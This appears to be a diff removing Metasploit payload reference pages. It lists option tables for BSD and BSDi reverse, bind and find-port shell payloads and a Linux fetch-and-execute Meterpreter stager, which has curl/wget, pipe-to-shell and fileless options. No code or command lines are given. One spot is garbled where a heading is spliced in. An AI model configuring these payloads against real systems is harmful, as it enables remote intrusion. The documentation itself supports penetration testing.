StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
TAG qFGA yes The four byte tag to signify the connection.
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,53 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Reverse TCP Stager (IPv6)
|
|
||||||
Module: payload/bsd/x86/shell/reverse_ipv6_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 81
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
vlad902 <vlad902@gmail.com>
|
|
||||||
hdm <x@hdm.io>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
SCOPEID 0 no IPv6 scope ID, for link-local addresses
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a command shell (staged).
|
|
||||||
|
|
||||||
Connect back to the attacker over IPv6
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,50 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Reverse TCP Stager
|
|
||||||
Module: payload/bsd/x86/shell/reverse_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 43
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a command shell (staged).
|
|
||||||
|
|
||||||
Connect back to the attacker
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,38 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Bind TCP Inline
|
|
||||||
Module: payload/bsd/x86/shell_bind_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 73
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Ramon de C Valle <rcvalle@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Listen for a connection and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,40 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Bind TCP Inline (IPv6)
|
|
||||||
Module: payload/bsd/x86/shell_bind_tcp_ipv6
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 87
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
vlad902 <vlad902@gmail.com>
|
|
||||||
hdm <x@hdm.io>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Listen for a connection and spawn a command shell over IPv6
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,37 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Find Port Inline
|
|
||||||
Module: payload/bsd/x86/shell_find_port
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 60
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Ramon de C Valle <rcvalle@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
CPORT 35777 no The local client port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a shell on an established connection
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,33 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Find Tag Inline
|
|
||||||
Module: payload/bsd/x86/shell_find_tag
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 70
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a shell on an established connection (proxy/NAT safe)
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
TAG T2v6 yes The four byte tag to signify the connection.
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,45 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Reverse TCP Inline
|
|
||||||
Module: payload/bsd/x86/shell_reverse_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 64
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Ramon de C Valle <rcvalle@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,48 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Reverse TCP Inline (IPv6)
|
|
||||||
Module: payload/bsd/x86/shell_reverse_tcp_ipv6
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 96
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
vlad902 <vlad902@gmail.com>
|
|
||||||
hdm <x@hdm.io>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
SCOPEID 0 no IPv6 scope ID, for link-local addresses
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell over IPv6
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,43 +0,0 @@
|
|||||||
|
|
||||||
Name: BSDi Command Shell, Bind TCP Stager
|
|
||||||
Module: payload/bsdi/x86/shell/bind_tcp
|
|
||||||
Platform: BSDi
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 69
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a command shell (staged).
|
|
||||||
|
|
||||||
Listen for a connection
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,50 +0,0 @@
|
|||||||
|
|
||||||
Name: BSDi Command Shell, Reverse TCP Stager
|
|
||||||
Module: payload/bsdi/x86/shell/reverse_tcp
|
|
||||||
Platform: BSDi
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 59
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a command shell (staged).
|
|
||||||
|
|
||||||
Connect back to the attacker
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,32 +0,0 @@
|
|||||||
|
|
||||||
Name: BSDi Command Shell, Bind TCP Inline
|
|
||||||
Module: payload/bsdi/x86/shell_bind_tcp
|
|
||||||
Platform: BSDi
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 90
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
optyx <optyx@no$email.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Listen for a connection and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,31 +0,0 @@
|
|||||||
|
|
||||||
Name: BSDi Command Shell, Find Port Inline
|
|
||||||
Module: payload/bsdi/x86/shell_find_port
|
|
||||||
Platform: BSDi
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 77
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
optyx <optyx@no$email.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
CPORT 37232 no The local client port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a shell on an established connection
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,39 +0,0 @@
|
|||||||
|
|
||||||
Name: BSDi Command Shell, Reverse TCP Inline
|
|
||||||
Module: payload/bsdi/x86/shell_reverse_tcp
|
|
||||||
Platform: BSDi
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 77
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
optyx <optyx@no$email.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,100 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch, Reverse TCP Stager
|
|
||||||
Module: payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 102
|
|
||||||
Rank: Norma
|
|
||||||
Evasion options for payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
ic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME fGKaZjGk no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
|
||||||
Connect back to the attacker
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
